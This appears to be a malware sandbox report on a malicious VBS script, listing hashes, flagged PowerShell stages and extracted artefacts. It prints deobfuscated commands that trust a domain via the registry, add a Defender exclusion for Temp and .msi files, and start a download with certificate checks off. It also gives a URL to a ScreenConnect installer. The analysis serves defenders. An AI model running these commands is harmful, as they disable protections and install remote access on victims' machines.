Malicious
Malicious
Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
cc2fa5d1e8557b9db21b12766da0a97a
Sha1
ff7563fe2345860e4fd4d9ddd355a7951aa25e9a
Sha256
7a7dfe2d2f86e213819cf5c66a2b4b84c82baccd5dda1e3cb143e165d2ea04a0
Sha384
1413a59fa00bd89108a31a7980f33d9592260ebcea18747881a5c70f78b2c27e46d718bfbd9ea69c9db5c576cc79efdb
Sha512
0b8024f5407f3f26c92b73389ce6f6357dc1408cd5eb9dbc097bab0735450880447c360ed739e17531c9ebfb3aa9d830775f75a3af2a0ebd2cf647916bca07e1
SSDeep
192:OAEfbAU/M2uMna8mK/Mg8yv/O/8/AYAs/E/74/7/KdNgVs//H+p/GEk/7/n81j1Q:TEfEV2uMkHysYLoO/aXN
TLSH
8662E712E80795328572523AC61B4C28DB97509320129C26BEDC450FEFB5B8FDAE52EF
File Structure
cc2fa5d1e8557b9db21b12766da0a97a
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
cc2fa5d1e8557b9db21b12766da0a97a.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Command #2]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Command #3]
Malicious
[Command #4]
Malicious
[Command #5]
Malicious
[Command #6]
Malicious
[Command #8]
Malicious
[Command #9]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

https://server.tt-ynl.top/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest
URLs in VB Code - #2

https://endpointcentral.manageengine.com/api/agent/register
URLs in VB Code - #3

https://dashboard.manageengine.com/api/install
URLs in VB Code - #4

http://track.manageengine.com/log
Deobfuscated PowerShell

"$zone = [System.Security.SecurityZone]::Trusted; [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains', $true).CreateSubKey('equiposmedicosdealtatecnologia.com.mx').SetValue('https', 2, 'DWord'); [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains', $true).CreateSubKey('equiposmedicosdealtatecnologia.com.mx').SetValue('http', 2, 'DWord')"
Deobfuscated PowerShell

Add-MpPreference -ExclusionPath "C:\Windows\Temp\" -ExclusionExtension ".msi"
Deobfuscated PowerShell

"$ProgressPreference = 'SilentlyContinue'; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $headers = @{'User-Agent' = 'Microsoft Update Agent'; 'Accept' = '*/*'}; Invoke-WebRequest -Uri '"
cc2fa5d1e8557b9db21b12766da0a97a (15.91 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙